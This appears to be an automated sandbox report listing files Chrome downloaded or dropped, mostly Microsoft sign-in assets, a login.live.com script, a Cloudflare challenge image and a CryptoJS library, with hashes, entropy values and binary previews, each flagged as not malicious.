                                                            SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                            MD5:166DE53471265253AB3A456DEFE6DA23
                                                            SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                            SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                            SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                            Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                            Category:dropped
                                                            Size (bytes):5525
                                                            Entropy (8bit):7.961202222662501
                                                            Encrypted:false
                                                            SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                            MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                            SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                            SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                            SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):52
                                                            Entropy (8bit):4.285366469574286
                                                            Encrypted:false
                                                            SSDEEP:3:OgGunSHnP20TviWP6Ln:O6SHPTTvfPCn
                                                            MD5:72AB058D2FA559E3E6B52394976CCFED
                                                            SHA1:C46C96A456C45FA250B2AD92B6AA612F7579BF9E
                                                            SHA-256:C066F73B20113C8ABEBA91C9943F8A5B4DAE0985E7BA05EB60973260965892FE
                                                            SHA-512:00DD788ACDAEF6DF998BDD173E255C6DFD22FF9984A8EA5C524FD06701814DC343548633B52DD514327C4D64B4B3EC4D9ABCF2B53A207CC363A93092D41976E7
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISJQmQKfAfPn5OIhIFDZRU-s8SBQ2DqFs9EgUNSUCvSRIFDa8aOOA=?alt=proto
                                                            Preview:CiQKBw2UVPrPGgAKBw2DqFs9GgAKBw1JQK9JGgAKBw2vGjjgGgA=
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                            Category:downloaded
                                                            Size (bytes):35170
                                                            Entropy (8bit):7.993096534744333
                                                            Encrypted:true
                                                            SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                            MD5:171A4DD9400708B88724B57D62B24A6A
                                                            SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                            SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                            SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                            Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                            Category:downloaded
                                                            Size (bytes):16345
                                                            Entropy (8bit):7.98960525258912
                                                            Encrypted:false
                                                            SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                            MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                            SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                            SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                            SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js
                                                            Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                            Category:dropped
                                                            Size (bytes):673
                                                            Entropy (8bit):7.6596900876595075
                                                            Encrypted:false
                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:1
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:GIF image data, version 89a, 352 x 3
                                                            Category:downloaded
                                                            Size (bytes):3620
                                                            Entropy (8bit):6.867828878374734
                                                            Encrypted:false
                                                            SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                            MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                            SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                            SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                            SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                            Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):61
                                                            Entropy (8bit):3.990210155325004
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                            Category:dropped
                                                            Size (bytes):17174
                                                            Entropy (8bit):2.9129715116732746
                                                            Encrypted:false
                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                            Category:dropped
                                                            Size (bytes):116343
                                                            Entropy (8bit):7.997640489040715
                                                            Encrypted:true
                                                            SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                            MD5:3063B0DA40B45B46602FCE99AC53D315
                                                            SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                            SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                            SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):61
                                                            Entropy (8bit):3.990210155325004
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):48316
                                                            Entropy (8bit):5.6346993394709
                                                            Encrypted:false
                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                            Category:downloaded
                                                            Size (bytes):61052
                                                            Entropy (8bit):7.996159932827634
                                                            Encrypted:true
                                                            SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                            MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                            SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                            SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                            SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                            Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                            Category:downloaded
                                                            Size (bytes):3452
                                                            Entropy (8bit):5.117912766689607
                                                            Encrypted:false
                                                            SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                            MD5:CB06E9A552B197D5C0EA600B431A3407
                                                            SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                            SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                            SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://login.live.com/Me.htm?v=3
                                                            Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                            Category:dropped
                                                            Size (bytes):61052
                                                            Entropy (8bit):7.996159932827634
                                                            Encrypted:true
                                                            SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                            MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                            SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                            SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                            SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                            Category:downloaded
                                                            Size (bytes):1435
                                                            Entropy (8bit):7.8613342322590265
                                                            Encrypted:false
                                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
